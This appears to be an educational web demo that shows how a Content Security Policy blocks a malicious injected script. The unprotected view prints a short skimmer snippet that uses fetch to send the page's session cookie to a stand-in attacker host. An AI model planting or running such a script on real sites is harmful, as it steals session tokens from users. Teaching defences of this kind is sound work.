⚠️ No CSP — this page is unprotected
← All demos · CSP Demo 1 of 4

Malicious Script Injection

An attacker has injected a script that silently exfiltrates your session data. See how CSP stops it cold.

🔴 Unprotected ⚪ Protected
Attack in progress — malicious script is running

My Account

Logged in as [email protected]

🚨 Attack succeeded. The injected script has read your session token and sent it to evil-cyber-hacker.com.

💡 Open DevTools → Network tab to see the beacon request to evil-cyber-hacker.com.

// injected-skimmer.js (loaded from evil-cyber-hacker.com)
fetch('https://evil-cyber-hacker.com/steal', {
  method: 'POST',
  body: 'token=' + document.cookie
});
What's happening

Without CSP, the browser has no way to know that this script shouldn't be here. It was injected via a compromised ad, a third-party widget, or an XSS vulnerability — and the browser executes it without question.

← All demos
1 2 3 4
Demo 2 →